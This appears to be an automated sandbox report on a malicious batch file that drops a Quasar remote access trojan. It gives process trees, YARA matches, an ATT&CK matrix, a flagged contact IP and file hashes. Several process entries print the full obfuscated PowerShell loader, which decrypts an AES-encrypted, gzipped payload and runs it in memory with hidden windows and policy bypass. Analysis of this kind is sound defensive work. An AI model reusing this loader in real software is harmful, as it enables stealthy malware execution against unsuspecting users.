          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeMemory allocated: page read and write | page guardJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\allah.bat.exe "allah.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $lilxn = [system.io.file]::('txetlladaer'[-1..-11] -join '')('c:\users\user\appdata\local\temp\allah.bat').split([environment]::newline);foreach ($vohpq in $lilxn) { if ($vohpq.startswith(':: ')) { $ohwzk = $vohpq.substring(3); break; }; };$pphgd = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')($ohwzk);$ygmef = new-object system.security.cryptography.aesmanaged;$ygmef.mode = [system.security.cryptography.ciphermode]::cbc;$ygmef.padding = [system.security.cryptography.paddingmode]::pkcs7;$ygmef.key = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('6pnvywetf4chawo/pebnarz3xrlewmbpf3oumgmdvww=');$ygmef.iv = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('lxqslbfdvl0gyevxt5ivjg==');$blbua = $ygmef.createdecryptor();$pphgd = $blbua.transformfinalblock($pphgd, 0, $pphgd.length);$blbua.dispose();$ygmef.dispose();$mkymi = new-object system.io.memorystream(, $pphgd);$wtlbu = new-object system.io.memorystream;$jexhz = new-object system.io.compression.gzipstream($mkymi, [io.compression.compressionmode]::decompress);$jexhz.copyto($wtlbu);$jexhz.dispose();$mkymi.dispose();$wtlbu.dispose();$pphgd = $wtlbu.toarray();$wewpp = [system.reflection.assembly]::('daol'[-1..-4] -join '')($pphgd);$bdlvj = $wewpp.entrypoint;$bdlvj.invoke($null, (, [string[]] ('')))
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\allah.bat.exe "allah.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $lilxn = [system.io.file]::('txetlladaer'[-1..-11] -join '')('c:\users\user\appdata\local\temp\allah.bat').split([environment]::newline);foreach ($vohpq in $lilxn) { if ($vohpq.startswith(':: ')) { $ohwzk = $vohpq.substring(3); break; }; };$pphgd = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')($ohwzk);$ygmef = new-object system.security.cryptography.aesmanaged;$ygmef.mode = [system.security.cryptography.ciphermode]::cbc;$ygmef.padding = [system.security.cryptography.paddingmode]::pkcs7;$ygmef.key = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('6pnvywetf4chawo/pebnarz3xrlewmbpf3oumgmdvww=');$ygmef.iv = [system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('lxqslbfdvl0gyevxt5ivjg==');$blbua = $ygmef.createdecryptor();$pphgd = $blbua.transformfinalblock($pphgd, 0, $pphgd.length);$blbua.dispose();$ygmef.dispose();$mkymi = new-object system.io.memorystream(, $pphgd);$wtlbu = new-object system.io.memorystream;$jexhz = new-object system.io.compression.gzipstream($mkymi, [io.compression.compressionmode]::decompress);$jexhz.copyto($wtlbu);$jexhz.dispose();$mkymi.dispose();$wtlbu.dispose();$pphgd = $wtlbu.toarray();$wewpp = [system.reflection.assembly]::('daol'[-1..-4] -join '')($pphgd);$bdlvj = $wewpp.entrypoint;$bdlvj.invoke($null, (, [string[]] ('')))Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com Mode 60,3 Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe CERTUTIL -f -decode "C:\Users\user\Desktop\deneme.bat" "C:\Users\user\AppData\Local\Temp\allah.bat" Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\allah.bat.exe "allah.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $lILxN = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Local\Temp\allah.bat').Split([Environment]::NewLine);foreach ($vOhpq in $lILxN) { if ($vOhpq.StartsWith(':: ')) { $OHwZk = $vOhpq.Substring(3); break; }; };$PPhGD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($OHwZk);$YGMef = New-Object System.Security.Cryptography.AesManaged;$YGMef.Mode = [System.Security.Cryptography.CipherMode]::CBC;$YGMef.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$YGMef.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6pNVYWetf4chAWo/pEbNaRZ3xRLeWmBPF3OumGmDVww=');$YGMef.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lxQsLBFdvl0gyeVxt5ivJg==');$blbua = $YGMef.CreateDecryptor();$PPhGD = $blbua.TransformFinalBlock($PPhGD, 0, $PPhGD.Length);$blbua.Dispose();$YGMef.Dispose();$MkYmI = New-Object System.IO.MemoryStream(, $PPhGD);$wtLBU = New-Object System.IO.MemoryStream;$JeXHz = New-Object System.IO.Compression.GZipStream($MkYmI, [IO.Compression.CompressionMode]::Decompress);$JeXHz.CopyTo($wtLBU);$JeXHz.Dispose();$MkYmI.Dispose();$wtLBU.Dispose();$PPhGD = $wtLBU.ToArray();$weWpP = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($PPhGD);$BDLvJ = $weWpP.EntryPoint;$BDLvJ.Invoke($null, (, [string[]] ('')))Jump to behavior
          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected Quasar RAT
          Source: Yara matchFile source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.allah.bat.exe.20e62ced3d0.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.allah.bat.exe.20e693c0000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.allah.bat.exe.20e62ced3d0.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.633628598.0000020E50F0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: allah.bat.exe PID: 6956, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected Quasar RAT
          Source: Yara matchFile source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.allah.bat.exe.20e62ced3d0.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.allah.bat.exe.20e693c0000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.allah.bat.exe.20e62ced3d0.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.633628598.0000020E50F0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: allah.bat.exe PID: 6956, type: MEMORYSTR

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Windows Management Instrumentation          		Path Interception11
          Process Injection          		1
          Masquerading          		OS Credential Dumping121
          Security Software Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts1
          Command and Scripting Interpreter          		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Disable or Modify Tools          		LSASS Memory1
          Process Discovery          		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
          Non-Standard Port          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts1
          Scripting          		Logon Script (Windows)Logon Script (Windows)41
          Virtualization/Sandbox Evasion          		Security Account Manager41
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
          Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local Accounts1
          PowerShell          		Logon Script (Mac)Logon Script (Mac)11
          Process Injection          		NTDS1
          Application Window Discovery          		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Scripting          		LSA Secrets22
          System Information Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Hidden Files and Directories          		Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          Obfuscated Files or Information          		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          deneme.bat8%ReversingLabsText.Malware.Generic
          deneme.bat17%VirustotalBrowse

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\allah.bat100%AviraTR/Dldr.Malnote.U
          C:\Users\user\AppData\Local\Temp\allah.bat.exe0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\allah.bat.exe0%VirustotalBrowse

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          https://go.micro0%URL Reputationsafe
          https://contoso.com/0%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          74.234.104.2360%Avira URL Cloudsafe
          https://ipwho.is/0%VirustotalBrowse
          https://go.microsoft.cot0%Avira URL Cloudsafe
          https://ipwho.is/0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          No contacted domains info

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          74.234.104.236true
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://api.ipify.org/allah.bat.exe, 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            http://nuget.org/NuGet.exeallah.bat.exe, 00000004.00000002.647921815.0000020E60D70000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://stackoverflow.com/q/14436606/23354allah.bat.exe, 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, allah.bat.exe, 00000004.00000002.633628598.0000020E518B2000.00000004.00000800.00020000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://pesterbdd.com/images/Pester.pngallah.bat.exe, 00000004.00000002.633628598.0000020E50F0A000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlallah.bat.exe, 00000004.00000002.633628598.0000020E50F0A000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://go.microallah.bat.exe, 00000004.00000002.633628598.0000020E520F9000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://stackoverflow.com/q/11564914/23354;allah.bat.exe, 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://stackoverflow.com/q/2152978/23354allah.bat.exe, 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://contoso.com/allah.bat.exe, 00000004.00000002.647921815.0000020E60D70000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://nuget.org/nuget.exeallah.bat.exe, 00000004.00000002.647921815.0000020E60D70000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://contoso.com/Licenseallah.bat.exe, 00000004.00000002.647921815.0000020E60D70000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contoso.com/Iconallah.bat.exe, 00000004.00000002.647921815.0000020E60D70000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://ipwho.is/allah.bat.exe, 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmpfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameallah.bat.exe, 00000004.00000002.633628598.0000020E50D01000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://github.com/Pester/Pesterallah.bat.exe, 00000004.00000002.633628598.0000020E50F0A000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://go.microsoft.cotallah.bat.exe, 00000004.00000002.677997205.0000020E68E86000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            74.234.104.236
                            		unknownUnited States
                            		7018ATT-INTERNET4UStrue

                            General Information

                            Joe Sandbox Version:37.1.0 Beryl
                            Analysis ID:876996
                            Start date and time:2023-05-28 09:33:54 +02:00
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 7m 45s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:9
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample file name:deneme.bat
                            Detection:MAL
                            Classification:mal100.troj.evad.winBAT@8/6@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:Failed
                            HCA Information:
                            • Successful, ratio: 97%
                            • Number of executed functions: 73
                            • Number of non-executed functions: 4
                            Cookbook Comments:
                            • Found application associated with file extension: .bat

                            Warnings

                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtSetInformationFile calls found.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            09:34:54API Interceptor43x Sleep call for process: allah.bat.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            74.234.104.236allah.batGet hashmaliciousQuasarBrowse

                              Domains

                              No context

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              ATT-INTERNET4USxWmdTCfC2t.elfGet hashmaliciousMirai, MoobotBrowse
                              • 104.188.187.224
                              2RIfrkwl8Q.elfGet hashmaliciousMirai, MoobotBrowse
                              • 99.158.187.101
                              ufrz7wcBDi.elfGet hashmaliciousMirai, MoobotBrowse
                              • 107.200.139.9
                              8i87E84xva.elfGet hashmaliciousMirai, MoobotBrowse
                              • 108.234.108.134
                              6AU1Y1X4Oy.elfGet hashmaliciousMirai, MoobotBrowse
                              • 13.144.6.51
                              zzBfFkqnEg.elfGet hashmaliciousMirai, MoobotBrowse
                              • 108.196.66.19
                              91lC01xoJL.elfGet hashmaliciousMirai, MoobotBrowse
                              • 76.227.191.116
                              bnzOgmGCkF.elfGet hashmaliciousMirai, MoobotBrowse
                              • 99.2.201.225
                              RQsecy8d0u.elfGet hashmaliciousMirai, MoobotBrowse
                              • 68.21.51.3
                              allah.batGet hashmaliciousQuasarBrowse
                              • 74.234.104.236
                              freshman.jsGet hashmaliciousUnknownBrowse
                              • 71.143.125.219
                              FpYvEAtlSE.elfGet hashmaliciousMiraiBrowse
                              • 71.153.237.164
                              Oea3YPoJ4F.elfGet hashmaliciousMiraiBrowse
                              • 70.225.194.120
                              yg4p59NLkm.elfGet hashmaliciousMiraiBrowse
                              • 104.62.108.186
                              TWarAEAwUa.elfGet hashmaliciousMiraiBrowse
                              • 32.48.63.129
                              A6BM2Ru5xc.elfGet hashmaliciousMiraiBrowse
                              • 74.171.107.150
                              tiOxLaAfn6.elfGet hashmaliciousMiraiBrowse
                              • 70.228.140.105
                              muchnessGateway.jsGet hashmaliciousUnknownBrowse
                              • 107.97.247.144
                              misadministrati.jsGet hashmaliciousUnknownBrowse
                              • 99.128.119.232
                              moronismUndiffi.jsGet hashmaliciousUnknownBrowse
                              • 104.62.160.68

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              C:\Users\user\AppData\Local\Temp\allah.bat.exeKqB3s5B5BI.exeGet hashmaliciousUnknownBrowse
                                allah.batGet hashmaliciousQuasarBrowse
                                  5hhAqfqkLs.exeGet hashmaliciousUnknownBrowse
                                    5hhAqfqkLs.exeGet hashmaliciousUnknownBrowse
                                      UI721.bin.exeGet hashmaliciousAgentTesla, LockBit ransomware, LummaC Stealer, RedLine, TrojanRansom, zgRATBrowse
                                        SecuriteInfo.com.IL.Trojan.MSILZilla.20149.21390.6577.exeGet hashmaliciousUnknownBrowse
                                          Invoice_6238829.batGet hashmaliciousUnknownBrowse
                                            1.batGet hashmaliciousAsyncRATBrowse
                                              beampredictor.batGet hashmaliciousUnknownBrowse
                                                c.cmdGet hashmaliciousDcRatBrowse
                                                  SEQ833Ufdl.exeGet hashmaliciousUnknownBrowse
                                                    5rIuV7bm6g.exeGet hashmaliciousQuasar, XWormBrowse
                                                      update.batGet hashmaliciousUnknownBrowse
                                                        Aktar#U0131m_kopyas#U0131.batGet hashmaliciousUnknownBrowse
                                                          Remittance_slip.batGet hashmaliciousUnknownBrowse
                                                            payload1.dll.exeGet hashmaliciousUnknownBrowse
                                                              umuJhqgUNH.exeGet hashmaliciousUnknownBrowse
                                                                Setup.batGet hashmaliciousUnknownBrowse
                                                                  Parts and Inquiry.batGet hashmaliciousUnknownBrowse
                                                                    loder.batGet hashmaliciousUnknownBrowse

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\allah.bat.exe
                                                                      File Type:data
                                                                      Category:modified
                                                                      Size (bytes):9432
                                                                      Entropy (8bit):4.918232018284106
                                                                      Encrypted:false
                                                                      SSDEEP:192:Nxoe5FpOMxoe5Pib4GVsm5emdygkjDt4iWN3yBGHh9smidcU6CGdcU6CS9smDpOh:bfib4Glkjh4iUxs14fib41
                                                                      MD5:F6775EDC5EE3B8EEDBF8310BD48C709D
                                                                      SHA1:51DBC51183BFBFE57F24E9AD63840E60D2E64842
                                                                      SHA-256:B5D6E4B1EF4F3E734E47F87E8226814AE7D574F4E458CCE4E21D637588F45B28
                                                                      SHA-512:EDCED69415369C7EBA17D72EC1691FE44F5C5DCF7565EAE1A22112E631FFBBCE72B830BBF0D91E70484BC7F0E4D59870777B07E86126438E78E15A7337D97BD6
                                                                      Malicious:false
                                                                      Reputation:high, very likely benign file
                                                                      Preview:PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lws4mod0.ycy.ps1

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\allah.bat.exe
                                                                      File Type:very short file (no magic)
                                                                      Category:dropped
                                                                      Size (bytes):1
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:U:U
                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                      Malicious:false
                                                                      Reputation:high, very likely benign file
                                                                      Preview:1

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mwf14wkq.feb.psm1

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Local\Temp\allah.bat.exe
                                                                      File Type:very short file (no magic)
                                                                      Category:dropped
                                                                      Size (bytes):1
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:U:U
                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                      Malicious:false
                                                                      Preview:1

                                                                      C:\Users\user\AppData\Local\Temp\allah.bat

                                                                      Download File
                                                                      Process:C:\Windows\System32\certutil.exe
                                                                      File Type:DOS batch file, ASCII text, with very long lines (59710), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1656310
                                                                      Entropy (8bit):6.015691015837739
                                                                      Encrypted:false
                                                                      SSDEEP:24576:2XSg2xeZeRalJecyKKAkS7Nr2C5Uz7yYmdAC8cywn+H8b/7KdxinkWrrMt:QSFQlC+92kKMh+yQRr
                                                                      MD5:EAE03E33CC6A6DA5B23F9508133E453C
                                                                      SHA1:1BEF2A1688C72A0A29B6CA6D378D57BB718DBBB7
                                                                      SHA-256:5642778FEF03F7E81A81BB97A3C33D0B569479C65B556EB1CDAE50108BBC8A14
                                                                      SHA-512:95A20A2A89D5910B0FABBCC0B96FCDFCC34BA226D076E17F65DBF7AED0C7FB1DBE7819FE1EEE3265ED1988F1075F614701B2195E65ABA9575D8E810DC29302D1
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Avira, Detection: 100%
